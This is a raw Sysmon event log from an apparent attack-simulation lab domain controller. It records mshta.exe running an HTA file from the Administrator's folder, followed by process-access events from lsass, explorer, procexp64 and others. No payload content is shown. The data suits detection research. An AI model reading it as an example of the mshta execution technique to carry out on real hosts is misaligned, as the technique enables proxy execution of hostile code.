exitC:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA,IMPHASH=5E0145CEF36FA9BFBA7DE33AA683B8ED{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 10341000x8000000000000000787278Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.517{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.502{732C744F-1518-600B-0B00-00000000A301}8563440C:\Windows\system32\lsass.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.502{732C744F-1518-600B-0B00-00000000A301}8563440C:\Windows\system32\lsass.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.486{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.486{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-17DF-600B-9401-00000000A301}5084884C:\Windows\system32\csrss.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000787262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-2806-600F-D682-00000000A301}66245300C:\Windows\explorer.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+18d48c|C:\Windows\System32\SHELL32.dll+18d1e3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000787261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.471{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Administrator\Test.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=A65AE0DB1DAA6B07C89DCC1E21D3EB42,SHA256=5B6429B98ADF532E6F694C9A6CD1A1943B4AA3D5EA524D4FB353939FD9C61342,IMPHASH=79925B1930721457F5E11BF877806843{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exeC:\Windows\explorer.exe /NOUACCHECK 10341000x8000000000000000787675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-CAA2-00000000A301}2912C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C9A2-00000000A301}2788C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cfe|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0cef|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.783{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787664Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787663Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:11.767{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 